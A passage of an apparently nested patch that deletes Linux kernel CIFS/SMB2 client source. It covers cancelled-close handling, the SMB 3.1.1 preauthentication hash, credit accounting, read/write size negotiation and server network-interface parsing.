+-		cifs_tcon_dbg(VFS, "Close interrupted close\n");
+-
+-	rc = SMB2_close(0, tcon, cancelled->fid.persistent_fid,
+-			cancelled->fid.volatile_fid);
+-	if (rc)
+-		cifs_tcon_dbg(VFS, "Close cancelled mid failed rc:%d\n", rc);
+-
+-	cifs_put_tcon(tcon);
+-	kfree(cancelled);
+-}
+-
+-/*
+- * Caller should already has an extra reference to @tcon
+- * This function is used to queue work to close a handle to prevent leaks
+- * on the server.
+- * We handle two cases. If an open was interrupted after we sent the
+- * SMB2_CREATE to the server but before we processed the reply, and second
+- * if a close was interrupted before we sent the SMB2_CLOSE to the server.
+- */
+-static int
+-__smb2_handle_cancelled_cmd(struct cifs_tcon *tcon, __u16 cmd, __u64 mid,
+-			    __u64 persistent_fid, __u64 volatile_fid)
+-{
+-	struct close_cancelled_open *cancelled;
+-
+-	cancelled = kzalloc(sizeof(*cancelled), GFP_ATOMIC);
+-	if (!cancelled)
+-		return -ENOMEM;
+-
+-	cancelled->fid.persistent_fid = persistent_fid;
+-	cancelled->fid.volatile_fid = volatile_fid;
+-	cancelled->tcon = tcon;
+-	cancelled->cmd = cmd;
+-	cancelled->mid = mid;
+-	INIT_WORK(&cancelled->work, smb2_cancelled_close_fid);
+-	WARN_ON(queue_work(cifsiod_wq, &cancelled->work) == false);
+-
+-	return 0;
+-}
+-
+-int
+-smb2_handle_cancelled_close(struct cifs_tcon *tcon, __u64 persistent_fid,
+-			    __u64 volatile_fid)
+-{
+-	int rc;
+-
+-	cifs_dbg(FYI, "%s: tc_count=%d\n", __func__, tcon->tc_count);
+-	spin_lock(&cifs_tcp_ses_lock);
+-	if (tcon->tc_count <= 0) {
+-		struct TCP_Server_Info *server = NULL;
+-
+-		WARN_ONCE(tcon->tc_count < 0, "tcon refcount is negative");
+-		spin_unlock(&cifs_tcp_ses_lock);
+-
+-		if (tcon->ses)
+-			server = tcon->ses->server;
+-
+-		cifs_server_dbg(FYI, "tid=0x%x: tcon is closing, skipping async close retry of fid %llu %llu\n",
+-				tcon->tid, persistent_fid, volatile_fid);
+-
+-		return 0;
+-	}
+-	tcon->tc_count++;
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	rc = __smb2_handle_cancelled_cmd(tcon, SMB2_CLOSE_HE, 0,
+-					 persistent_fid, volatile_fid);
+-	if (rc)
+-		cifs_put_tcon(tcon);
+-
+-	return rc;
+-}
+-
+-int
+-smb2_handle_cancelled_mid(struct mid_q_entry *mid, struct TCP_Server_Info *server)
+-{
+-	struct smb2_hdr *hdr = mid->resp_buf;
+-	struct smb2_create_rsp *rsp = mid->resp_buf;
+-	struct cifs_tcon *tcon;
+-	int rc;
+-
+-	if ((mid->optype & CIFS_CP_CREATE_CLOSE_OP) || hdr->Command != SMB2_CREATE ||
+-	    hdr->Status != STATUS_SUCCESS)
+-		return 0;
+-
+-	tcon = smb2_find_smb_tcon(server, le64_to_cpu(hdr->SessionId),
+-				  le32_to_cpu(hdr->Id.SyncId.TreeId));
+-	if (!tcon)
+-		return -ENOENT;
+-
+-	rc = __smb2_handle_cancelled_cmd(tcon,
+-					 le16_to_cpu(hdr->Command),
+-					 le64_to_cpu(hdr->MessageId),
+-					 rsp->PersistentFileId,
+-					 rsp->VolatileFileId);
+-	if (rc)
+-		cifs_put_tcon(tcon);
+-
+-	return rc;
+-}
+-
+-/**
+- * smb311_update_preauth_hash - update @ses hash with the packet data in @iov
+- *
+- * Assumes @iov does not contain the rfc1002 length and iov[0] has the
+- * SMB2 header.
+- *
+- * @ses:	server session structure
+- * @server:	pointer to server info
+- * @iov:	array containing the SMB request we will send to the server
+- * @nvec:	number of array entries for the iov
+- */
+-int
+-smb311_update_preauth_hash(struct cifs_ses *ses, struct TCP_Server_Info *server,
+-			   struct kvec *iov, int nvec)
+-{
+-	int i, rc;
+-	struct smb2_hdr *hdr;
+-	struct shash_desc *sha512 = NULL;
+-
+-	hdr = (struct smb2_hdr *)iov[0].iov_base;
+-	/* neg prot are always taken */
+-	if (hdr->Command == SMB2_NEGOTIATE)
+-		goto ok;
+-
+-	/*
+-	 * If we process a command which wasn't a negprot it means the
+-	 * neg prot was already done, so the server dialect was set
+-	 * and we can test it. Preauth requires 3.1.1 for now.
+-	 */
+-	if (server->dialect != SMB311_PROT_ID)
+-		return 0;
+-
+-	if (hdr->Command != SMB2_SESSION_SETUP)
+-		return 0;
+-
+-	/* skip last sess setup response */
+-	if ((hdr->Flags & SMB2_FLAGS_SERVER_TO_REDIR)
+-	    && (hdr->Status == NT_STATUS_OK
+-		|| (hdr->Status !=
+-		    cpu_to_le32(NT_STATUS_MORE_PROCESSING_REQUIRED))))
+-		return 0;
+-
+-ok:
+-	rc = smb311_crypto_shash_allocate(server);
+-	if (rc)
+-		return rc;
+-
+-	sha512 = server->secmech.sha512;
+-	rc = crypto_shash_init(sha512);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not init sha512 shash\n", __func__);
+-		return rc;
+-	}
+-
+-	rc = crypto_shash_update(sha512, ses->preauth_sha_hash,
+-				 SMB2_PREAUTH_HASH_SIZE);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not update sha512 shash\n", __func__);
+-		return rc;
+-	}
+-
+-	for (i = 0; i < nvec; i++) {
+-		rc = crypto_shash_update(sha512, iov[i].iov_base, iov[i].iov_len);
+-		if (rc) {
+-			cifs_dbg(VFS, "%s: Could not update sha512 shash\n",
+-				 __func__);
+-			return rc;
+-		}
+-	}
+-
+-	rc = crypto_shash_final(sha512, ses->preauth_sha_hash);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not finalize sha512 shash\n",
+-			 __func__);
+-		return rc;
+-	}
+-
+-	return 0;
+-}
+diff --git a/fs/cifs/smb2ops.c b/fs/cifs/smb2ops.c
+deleted file mode 100644
+index d512440d35b6f..0000000000000
+--- a/fs/cifs/smb2ops.c
++++ /dev/null
+@@ -1,5805 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0
+-/*
+- *  SMB2 version specific operations
+- *
+- *  Copyright (c) 2012, Jeff Layton <jlayton@redhat.com>
+- */
+-
+-#include <linux/pagemap.h>
+-#include <linux/vfs.h>
+-#include <linux/falloc.h>
+-#include <linux/scatterlist.h>
+-#include <linux/uuid.h>
+-#include <linux/sort.h>
+-#include <crypto/aead.h>
+-#include <linux/fiemap.h>
+-#include <uapi/linux/magic.h>
+-#include "cifsfs.h"
+-#include "cifsglob.h"
+-#include "smb2pdu.h"
+-#include "smb2proto.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "cifs_unicode.h"
+-#include "smb2status.h"
+-#include "smb2glob.h"
+-#include "cifs_ioctl.h"
+-#include "smbdirect.h"
+-#include "fscache.h"
+-#include "fs_context.h"
+-#include "cached_dir.h"
+-
+-/* Change credits for different ops and return the total number of credits */
+-static int
+-change_conf(struct TCP_Server_Info *server)
+-{
+-	server->credits += server->echo_credits + server->oplock_credits;
+-	server->oplock_credits = server->echo_credits = 0;
+-	switch (server->credits) {
+-	case 0:
+-		return 0;
+-	case 1:
+-		server->echoes = false;
+-		server->oplocks = false;
+-		break;
+-	case 2:
+-		server->echoes = true;
+-		server->oplocks = false;
+-		server->echo_credits = 1;
+-		break;
+-	default:
+-		server->echoes = true;
+-		if (enable_oplocks) {
+-			server->oplocks = true;
+-			server->oplock_credits = 1;
+-		} else
+-			server->oplocks = false;
+-
+-		server->echo_credits = 1;
+-	}
+-	server->credits -= server->echo_credits + server->oplock_credits;
+-	return server->credits + server->echo_credits + server->oplock_credits;
+-}
+-
+-static void
+-smb2_add_credits(struct TCP_Server_Info *server,
+-		 const struct cifs_credits *credits, const int optype)
+-{
+-	int *val, rc = -1;
+-	int scredits, in_flight;
+-	unsigned int add = credits->value;
+-	unsigned int instance = credits->instance;
+-	bool reconnect_detected = false;
+-	bool reconnect_with_invalid_credits = false;
+-
+-	spin_lock(&server->req_lock);
+-	val = server->ops->get_credits_field(server, optype);
+-
+-	/* eg found case where write overlapping reconnect messed up credits */
+-	if (((optype & CIFS_OP_MASK) == CIFS_NEG_OP) && (*val != 0))
+-		reconnect_with_invalid_credits = true;
+-
+-	if ((instance == 0) || (instance == server->reconnect_instance))
+-		*val += add;
+-	else
+-		reconnect_detected = true;
+-
+-	if (*val > 65000) {
+-		*val = 65000; /* Don't get near 64K credits, avoid srv bugs */
+-		pr_warn_once("server overflowed SMB3 credits\n");
+-		trace_smb3_overflow_credits(server->CurrentMid,
+-					    server->conn_id, server->hostname, *val,
+-					    add, server->in_flight);
+-	}
+-	server->in_flight--;
+-	if (server->in_flight == 0 &&
+-	   ((optype & CIFS_OP_MASK) != CIFS_NEG_OP) &&
+-	   ((optype & CIFS_OP_MASK) != CIFS_SESS_OP))
+-		rc = change_conf(server);
+-	/*
+-	 * Sometimes server returns 0 credits on oplock break ack - we need to
+-	 * rebalance credits in this case.
+-	 */
+-	else if (server->in_flight > 0 && server->oplock_credits == 0 &&
+-		 server->oplocks) {
+-		if (server->credits > 1) {
+-			server->credits--;
+-			server->oplock_credits++;
+-		}
+-	}
+-	scredits = *val;
+-	in_flight = server->in_flight;
+-	spin_unlock(&server->req_lock);
+-	wake_up(&server->request_q);
+-
+-	if (reconnect_detected) {
+-		trace_smb3_reconnect_detected(server->CurrentMid,
+-			server->conn_id, server->hostname, scredits, add, in_flight);
+-
+-		cifs_dbg(FYI, "trying to put %d credits from the old server instance %d\n",
+-			 add, instance);
+-	}
+-
+-	if (reconnect_with_invalid_credits) {
+-		trace_smb3_reconnect_with_invalid_credits(server->CurrentMid,
+-			server->conn_id, server->hostname, scredits, add, in_flight);
+-		cifs_dbg(FYI, "Negotiate operation when server credits is non-zero. Optype: %d, server credits: %d, credits added: %d\n",
+-			 optype, scredits, add);
+-	}
+-
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus == CifsNeedReconnect
+-	    || server->tcpStatus == CifsExiting) {
+-		spin_unlock(&server->srv_lock);
+-		return;
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-	switch (rc) {
+-	case -1:
+-		/* change_conf hasn't been executed */
+-		break;
+-	case 0:
+-		cifs_server_dbg(VFS, "Possible client or server bug - zero credits\n");
+-		break;
+-	case 1:
+-		cifs_server_dbg(VFS, "disabling echoes and oplocks\n");
+-		break;
+-	case 2:
+-		cifs_dbg(FYI, "disabling oplocks\n");
+-		break;
+-	default:
+-		/* change_conf rebalanced credits for different types */
+-		break;
+-	}
+-
+-	trace_smb3_add_credits(server->CurrentMid,
+-			server->conn_id, server->hostname, scredits, add, in_flight);
+-	cifs_dbg(FYI, "%s: added %u credits total=%d\n", __func__, add, scredits);
+-}
+-
+-static void
+-smb2_set_credits(struct TCP_Server_Info *server, const int val)
+-{
+-	int scredits, in_flight;
+-
+-	spin_lock(&server->req_lock);
+-	server->credits = val;
+-	if (val == 1)
+-		server->reconnect_instance++;
+-	scredits = server->credits;
+-	in_flight = server->in_flight;
+-	spin_unlock(&server->req_lock);
+-
+-	trace_smb3_set_credits(server->CurrentMid,
+-			server->conn_id, server->hostname, scredits, val, in_flight);
+-	cifs_dbg(FYI, "%s: set %u credits\n", __func__, val);
+-
+-	/* don't log while holding the lock */
+-	if (val == 1)
+-		cifs_dbg(FYI, "set credits to 1 due to smb2 reconnect\n");
+-}
+-
+-static int *
+-smb2_get_credits_field(struct TCP_Server_Info *server, const int optype)
+-{
+-	switch (optype) {
+-	case CIFS_ECHO_OP:
+-		return &server->echo_credits;
+-	case CIFS_OBREAK_OP:
+-		return &server->oplock_credits;
+-	default:
+-		return &server->credits;
+-	}
+-}
+-
+-static unsigned int
+-smb2_get_credits(struct mid_q_entry *mid)
+-{
+-	return mid->credits_received;
+-}
+-
+-static int
+-smb2_wait_mtu_credits(struct TCP_Server_Info *server, unsigned int size,
+-		      unsigned int *num, struct cifs_credits *credits)
+-{
+-	int rc = 0;
+-	unsigned int scredits, in_flight;
+-
+-	spin_lock(&server->req_lock);
+-	while (1) {
+-		if (server->credits <= 0) {
+-			spin_unlock(&server->req_lock);
+-			cifs_num_waiters_inc(server);
+-			rc = wait_event_killable(server->request_q,
+-				has_credits(server, &server->credits, 1));
+-			cifs_num_waiters_dec(server);
+-			if (rc)
+-				return rc;
+-			spin_lock(&server->req_lock);
+-		} else {
+-			spin_unlock(&server->req_lock);
+-			spin_lock(&server->srv_lock);
+-			if (server->tcpStatus == CifsExiting) {
+-				spin_unlock(&server->srv_lock);
+-				return -ENOENT;
+-			}
+-			spin_unlock(&server->srv_lock);
+-
+-			spin_lock(&server->req_lock);
+-			scredits = server->credits;
+-			/* can deadlock with reopen */
+-			if (scredits <= 8) {
+-				*num = SMB2_MAX_BUFFER_SIZE;
+-				credits->value = 0;
+-				credits->instance = 0;
+-				break;
+-			}
+-
+-			/* leave some credits for reopen and other ops */
+-			scredits -= 8;
+-			*num = min_t(unsigned int, size,
+-				     scredits * SMB2_MAX_BUFFER_SIZE);
+-
+-			credits->value =
+-				DIV_ROUND_UP(*num, SMB2_MAX_BUFFER_SIZE);
+-			credits->instance = server->reconnect_instance;
+-			server->credits -= credits->value;
+-			server->in_flight++;
+-			if (server->in_flight > server->max_in_flight)
+-				server->max_in_flight = server->in_flight;
+-			break;
+-		}
+-	}
+-	scredits = server->credits;
+-	in_flight = server->in_flight;
+-	spin_unlock(&server->req_lock);
+-
+-	trace_smb3_wait_credits(server->CurrentMid,
+-			server->conn_id, server->hostname, scredits, -(credits->value), in_flight);
+-	cifs_dbg(FYI, "%s: removed %u credits total=%d\n",
+-			__func__, credits->value, scredits);
+-
+-	return rc;
+-}
+-
+-static int
+-smb2_adjust_credits(struct TCP_Server_Info *server,
+-		    struct cifs_credits *credits,
+-		    const unsigned int payload_size)
+-{
+-	int new_val = DIV_ROUND_UP(payload_size, SMB2_MAX_BUFFER_SIZE);
+-	int scredits, in_flight;
+-
+-	if (!credits->value || credits->value == new_val)
+-		return 0;
+-
+-	if (credits->value < new_val) {
+-		trace_smb3_too_many_credits(server->CurrentMid,
+-				server->conn_id, server->hostname, 0, credits->value - new_val, 0);
+-		cifs_server_dbg(VFS, "request has less credits (%d) than required (%d)",
+-				credits->value, new_val);
+-
+-		return -ENOTSUPP;
+-	}
+-
+-	spin_lock(&server->req_lock);
+-
+-	if (server->reconnect_instance != credits->instance) {
+-		scredits = server->credits;
+-		in_flight = server->in_flight;
+-		spin_unlock(&server->req_lock);
+-
+-		trace_smb3_reconnect_detected(server->CurrentMid,
+-			server->conn_id, server->hostname, scredits,
+-			credits->value - new_val, in_flight);
+-		cifs_server_dbg(VFS, "trying to return %d credits to old session\n",
+-			 credits->value - new_val);
+-		return -EAGAIN;
+-	}
+-
+-	server->credits += credits->value - new_val;
+-	scredits = server->credits;
+-	in_flight = server->in_flight;
+-	spin_unlock(&server->req_lock);
+-	wake_up(&server->request_q);
+-
+-	trace_smb3_adj_credits(server->CurrentMid,
+-			server->conn_id, server->hostname, scredits,
+-			credits->value - new_val, in_flight);
+-	cifs_dbg(FYI, "%s: adjust added %u credits total=%d\n",
+-			__func__, credits->value - new_val, scredits);
+-
+-	credits->value = new_val;
+-
+-	return 0;
+-}
+-
+-static __u64
+-smb2_get_next_mid(struct TCP_Server_Info *server)
+-{
+-	__u64 mid;
+-	/* for SMB2 we need the current value */
+-	spin_lock(&server->mid_lock);
+-	mid = server->CurrentMid++;
+-	spin_unlock(&server->mid_lock);
+-	return mid;
+-}
+-
+-static void
+-smb2_revert_current_mid(struct TCP_Server_Info *server, const unsigned int val)
+-{
+-	spin_lock(&server->mid_lock);
+-	if (server->CurrentMid >= val)
+-		server->CurrentMid -= val;
+-	spin_unlock(&server->mid_lock);
+-}
+-
+-static struct mid_q_entry *
+-__smb2_find_mid(struct TCP_Server_Info *server, char *buf, bool dequeue)
+-{
+-	struct mid_q_entry *mid;
+-	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
+-	__u64 wire_mid = le64_to_cpu(shdr->MessageId);
+-
+-	if (shdr->ProtocolId == SMB2_TRANSFORM_PROTO_NUM) {
+-		cifs_server_dbg(VFS, "Encrypted frame parsing not supported yet\n");
+-		return NULL;
+-	}
+-
+-	spin_lock(&server->mid_lock);
+-	list_for_each_entry(mid, &server->pending_mid_q, qhead) {
+-		if ((mid->mid == wire_mid) &&
+-		    (mid->mid_state == MID_REQUEST_SUBMITTED) &&
+-		    (mid->command == shdr->Command)) {
+-			kref_get(&mid->refcount);
+-			if (dequeue) {
+-				list_del_init(&mid->qhead);
+-				mid->mid_flags |= MID_DELETED;
+-			}
+-			spin_unlock(&server->mid_lock);
+-			return mid;
+-		}
+-	}
+-	spin_unlock(&server->mid_lock);
+-	return NULL;
+-}
+-
+-static struct mid_q_entry *
+-smb2_find_mid(struct TCP_Server_Info *server, char *buf)
+-{
+-	return __smb2_find_mid(server, buf, false);
+-}
+-
+-static struct mid_q_entry *
+-smb2_find_dequeue_mid(struct TCP_Server_Info *server, char *buf)
+-{
+-	return __smb2_find_mid(server, buf, true);
+-}
+-
+-static void
+-smb2_dump_detail(void *buf, struct TCP_Server_Info *server)
+-{
+-#ifdef CONFIG_CIFS_DEBUG2
+-	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
+-
+-	cifs_server_dbg(VFS, "Cmd: %d Err: 0x%x Flags: 0x%x Mid: %llu Pid: %d\n",
+-		 shdr->Command, shdr->Status, shdr->Flags, shdr->MessageId,
+-		 shdr->Id.SyncId.ProcessId);
+-	cifs_server_dbg(VFS, "smb buf %p len %u\n", buf,
+-		 server->ops->calc_smb_size(buf));
+-#endif
+-}
+-
+-static bool
+-smb2_need_neg(struct TCP_Server_Info *server)
+-{
+-	return server->max_read == 0;
+-}
+-
+-static int
+-smb2_negotiate(const unsigned int xid,
+-	       struct cifs_ses *ses,
+-	       struct TCP_Server_Info *server)
+-{
+-	int rc;
+-
+-	spin_lock(&server->mid_lock);
+-	server->CurrentMid = 0;
+-	spin_unlock(&server->mid_lock);
+-	rc = SMB2_negotiate(xid, ses, server);
+-	/* BB we probably don't need to retry with modern servers */
+-	if (rc == -EAGAIN)
+-		rc = -EHOSTDOWN;
+-	return rc;
+-}
+-
+-static unsigned int
+-smb2_negotiate_wsize(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
+-{
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	unsigned int wsize;
+-
+-	/* start with specified wsize, or default */
+-	wsize = ctx->wsize ? ctx->wsize : CIFS_DEFAULT_IOSIZE;
+-	wsize = min_t(unsigned int, wsize, server->max_write);
+-	if (!(server->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU))
+-		wsize = min_t(unsigned int, wsize, SMB2_MAX_BUFFER_SIZE);
+-
+-	return wsize;
+-}
+-
+-static unsigned int
+-smb3_negotiate_wsize(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
+-{
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	unsigned int wsize;
+-
+-	/* start with specified wsize, or default */
+-	wsize = ctx->wsize ? ctx->wsize : SMB3_DEFAULT_IOSIZE;
+-	wsize = min_t(unsigned int, wsize, server->max_write);
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	if (server->rdma) {
+-		if (server->sign)
+-			/*
+-			 * Account for SMB2 data transfer packet header and
+-			 * possible encryption header
+-			 */
+-			wsize = min_t(unsigned int,
+-				wsize,
+-				server->smbd_conn->max_fragmented_send_size -
+-					SMB2_READWRITE_PDU_HEADER_SIZE -
+-					sizeof(struct smb2_transform_hdr));
+-		else
+-			wsize = min_t(unsigned int,
+-				wsize, server->smbd_conn->max_readwrite_size);
+-	}
+-#endif
+-	if (!(server->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU))
+-		wsize = min_t(unsigned int, wsize, SMB2_MAX_BUFFER_SIZE);
+-
+-	return wsize;
+-}
+-
+-static unsigned int
+-smb2_negotiate_rsize(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
+-{
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	unsigned int rsize;
+-
+-	/* start with specified rsize, or default */
+-	rsize = ctx->rsize ? ctx->rsize : CIFS_DEFAULT_IOSIZE;
+-	rsize = min_t(unsigned int, rsize, server->max_read);
+-
+-	if (!(server->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU))
+-		rsize = min_t(unsigned int, rsize, SMB2_MAX_BUFFER_SIZE);
+-
+-	return rsize;
+-}
+-
+-static unsigned int
+-smb3_negotiate_rsize(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
+-{
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	unsigned int rsize;
+-
+-	/* start with specified rsize, or default */
+-	rsize = ctx->rsize ? ctx->rsize : SMB3_DEFAULT_IOSIZE;
+-	rsize = min_t(unsigned int, rsize, server->max_read);
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	if (server->rdma) {
+-		if (server->sign)
+-			/*
+-			 * Account for SMB2 data transfer packet header and
+-			 * possible encryption header
+-			 */
+-			rsize = min_t(unsigned int,
+-				rsize,
+-				server->smbd_conn->max_fragmented_recv_size -
+-					SMB2_READWRITE_PDU_HEADER_SIZE -
+-					sizeof(struct smb2_transform_hdr));
+-		else
+-			rsize = min_t(unsigned int,
+-				rsize, server->smbd_conn->max_readwrite_size);
+-	}
+-#endif
+-
+-	if (!(server->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU))
+-		rsize = min_t(unsigned int, rsize, SMB2_MAX_BUFFER_SIZE);
+-
+-	return rsize;
+-}
+-
+-static int
+-parse_server_interfaces(struct network_interface_info_ioctl_rsp *buf,
+-			size_t buf_len, struct cifs_ses *ses, bool in_mount)
+-{
+-	struct network_interface_info_ioctl_rsp *p;
+-	struct sockaddr_in *addr4;
+-	struct sockaddr_in6 *addr6;
+-	struct iface_info_ipv4 *p4;
+-	struct iface_info_ipv6 *p6;
+-	struct cifs_server_iface *info = NULL, *iface = NULL, *niface = NULL;
+-	struct cifs_server_iface tmp_iface;
+-	ssize_t bytes_left;
+-	size_t next = 0;
+-	int nb_iface = 0;
+-	int rc = 0, ret = 0;
+-
+-	bytes_left = buf_len;
+-	p = buf;
+-
+-	spin_lock(&ses->iface_lock);
+-	/* do not query too frequently, this time with lock held */
+-	if (ses->iface_last_update &&
+-	    time_before(jiffies, ses->iface_last_update +
+-			(SMB_INTERFACE_POLL_INTERVAL * HZ))) {
+-		spin_unlock(&ses->iface_lock);
+-		return 0;
+-	}
+-
+-	/*
+-	 * Go through iface_list and do kref_put to remove
+-	 * any unused ifaces. ifaces in use will be removed
+-	 * when the last user calls a kref_put on it
+-	 */
+-	list_for_each_entry_safe(iface, niface, &ses->iface_list,
+-				 iface_head) {
+-		iface->is_active = 0;
+-		kref_put(&iface->refcount, release_iface);
+-		ses->iface_count--;
+-	}
+-	spin_unlock(&ses->iface_lock);
+-
+-	/*
+-	 * Samba server e.g. can return an empty interface list in some cases,
+-	 * which would only be a problem if we were requesting multichannel
+-	 */
+-	if (bytes_left == 0) {
+-		/* avoid spamming logs every 10 minutes, so log only in mount */
+-		if ((ses->chan_max > 1) && in_mount)
+-			cifs_dbg(VFS,
+-				 "multichannel not available\n"
+-				 "Empty network interface list returned by server %s\n",
+-				 ses->server->hostname);
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+-	while (bytes_left >= sizeof(*p)) {
+-		memset(&tmp_iface, 0, sizeof(tmp_iface));
+-		tmp_iface.speed = le64_to_cpu(p->LinkSpeed);
+-		tmp_iface.rdma_capable = le32_to_cpu(p->Capability & RDMA_CAPABLE) ? 1 : 0;
+-		tmp_iface.rss_capable = le32_to_cpu(p->Capability & RSS_CAPABLE) ? 1 : 0;
+-
+-		switch (p->Family) {
+-		/*
+-		 * The kernel and wire socket structures have the same
+-		 * layout and use network byte order but make the
+-		 * conversion explicit in case either one changes.
+-		 */
+-		case INTERNETWORK:
+-			addr4 = (struct sockaddr_in *)&tmp_iface.sockaddr;
+-			p4 = (struct iface_info_ipv4 *)p->Buffer;
+-			addr4->sin_family = AF_INET;
+-			memcpy(&addr4->sin_addr, &p4->IPv4Address, 4);
+-
+-			/* [MS-SMB2] 2.2.32.5.1.1 Clients MUST ignore these */
+-			addr4->sin_port = cpu_to_be16(CIFS_PORT);
+-
+-			cifs_dbg(FYI, "%s: ipv4 %pI4\n", __func__,
+-				 &addr4->sin_addr);
+-			break;
+-		case INTERNETWORKV6:
+-			addr6 =	(struct sockaddr_in6 *)&tmp_iface.sockaddr;
+-			p6 = (struct iface_info_ipv6 *)p->Buffer;
+-			addr6->sin6_family = AF_INET6;
+-			memcpy(&addr6->sin6_addr, &p6->IPv6Address, 16);
+-
+-			/* [MS-SMB2] 2.2.32.5.1.2 Clients MUST ignore these */
+-			addr6->sin6_flowinfo = 0;
+-			addr6->sin6_scope_id = 0;
+-			addr6->sin6_port = cpu_to_be16(CIFS_PORT);
+-
+-			cifs_dbg(FYI, "%s: ipv6 %pI6\n", __func__,
+-				 &addr6->sin6_addr);
+-			break;
+-		default:
+-			cifs_dbg(VFS,
+-				 "%s: skipping unsupported socket family\n",
+-				 __func__);
+-			goto next_iface;
+-		}
+-
+-		/*
+-		 * The iface_list is assumed to be sorted by speed.
+-		 * Check if the new interface exists in that list.
+-		 * NEVER change iface. it could be in use.
+-		 * Add a new one instead
+-		 */
+-		spin_lock(&ses->iface_lock);
+-		iface = niface = NULL;
+-		list_for_each_entry_safe(iface, niface, &ses->iface_list,
+-					 iface_head) {
+-			ret = iface_cmp(iface, &tmp_iface);
+-			if (!ret) {
+-				/* just get a ref so that it doesn't get picked/freed */
+-				iface->is_active = 1;
+-				kref_get(&iface->refcount);
+-				ses->iface_count++;
+-				spin_unlock(&ses->iface_lock);
+-				goto next_iface;
+-			} else if (ret < 0) {
+-				/* all remaining ifaces are slower */
+-				kref_get(&iface->refcount);
+-				break;
+-			}
+-		}
+-		spin_unlock(&ses->iface_lock);
+-
+-		/* no match. insert the entry in the list */
+-		info = kmalloc(sizeof(struct cifs_server_iface),
+-			       GFP_KERNEL);
+-		if (!info) {
+-			rc = -ENOMEM;
+-			goto out;
+-		}
+-		memcpy(info, &tmp_iface, sizeof(tmp_iface));
+-
+-		/* add this new entry to the list */
+-		kref_init(&info->refcount);
+-		info->is_active = 1;
+-
+-		cifs_dbg(FYI, "%s: adding iface %zu\n", __func__, ses->iface_count);
+-		cifs_dbg(FYI, "%s: speed %zu bps\n", __func__, info->speed);
+-		cifs_dbg(FYI, "%s: capabilities 0x%08x\n", __func__,
+-			 le32_to_cpu(p->Capability));
+-
+-		spin_lock(&ses->iface_lock);
+-		if (!list_entry_is_head(iface, &ses->iface_list, iface_head)) {
+-			list_add_tail(&info->iface_head, &iface->iface_head);
+-			kref_put(&iface->refcount, release_iface);
+-		} else
+-			list_add_tail(&info->iface_head, &ses->iface_list);
+-
+-		ses->iface_count++;
+-		spin_unlock(&ses->iface_lock);
+-		ses->iface_last_update = jiffies;
+-next_iface:
+-		nb_iface++;
+-		next = le32_to_cpu(p->Next);
+-		if (!next) {
+-			bytes_left -= sizeof(*p);
+-			break;
+-		}
+-		p = (struct network_interface_info_ioctl_rsp *)((u8 *)p+next);
+-		bytes_left -= next;
+-	}
+-
+-	if (!nb_iface) {
+-		cifs_dbg(VFS, "%s: malformed interface info\n", __func__);
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+-	/* Azure rounds the buffer size up 8, to a 16 byte boundary */
+-	if ((bytes_left > 8) || p->Next)
+-		cifs_dbg(VFS, "%s: incomplete interface info\n", __func__);
+-
+-
+-	if (!ses->iface_count) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+-out:
+-	return rc;
+-}
+-
+-int
+-SMB3_request_interfaces(const unsigned int xid, struct cifs_tcon *tcon, bool in_mount)
+-{
+-	int rc;
+-	unsigned int ret_data_len = 0;
+-	struct network_interface_info_ioctl_rsp *out_buf = NULL;
+-	struct cifs_ses *ses = tcon->ses;
+-
+-	/* do not query too frequently */
+-	if (ses->iface_last_update &&
+-	    time_before(jiffies, ses->iface_last_update +
+-			(SMB_INTERFACE_POLL_INTERVAL * HZ)))
+-		return 0;
+-
+-	rc = SMB2_ioctl(xid, tcon, NO_FILE_ID, NO_FILE_ID,
+-			FSCTL_QUERY_NETWORK_INTERFACE_INFO,
+-			NULL /* no data input */, 0 /* no data input */,
+-			CIFSMaxBufSize, (char **)&out_buf, &ret_data_len);
+-	if (rc == -EOPNOTSUPP) {
+-		cifs_dbg(FYI,
+-			 "server does not support query network interfaces\n");
+-		ret_data_len = 0;
+-	} else if (rc != 0) {
+-		cifs_tcon_dbg(VFS, "error %d on ioctl to get interface list\n", rc);
+-		goto out;
+-	}
+-
+-	rc = parse_server_interfaces(out_buf, ret_data_len, ses, in_mount);
+-	if (rc)
+-		goto out;
+-
+-out:
+-	kfree(out_buf);
+-	return rc;
+-}
+-
+-static void
+-smb3_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
+-	      struct cifs_sb_info *cifs_sb)
+-{
+-	int rc;
+-	__le16 srch_path = 0; /* Null - open root of share */
+-	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	struct cifs_open_parms oparms;
+-	struct cifs_fid fid;
+-	struct cached_fid *cfid = NULL;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.path = "",
+-		.desired_access = FILE_READ_ATTRIBUTES,
+-		.disposition = FILE_OPEN,
+-		.create_options = cifs_create_options(cifs_sb, 0),
+-		.fid = &fid,
+-	};
+-
+-	rc = open_cached_dir(xid, tcon, "", cifs_sb, false, &cfid);
+-	if (rc == 0)
+-		memcpy(&fid, &cfid->fid, sizeof(struct cifs_fid));
+-	else
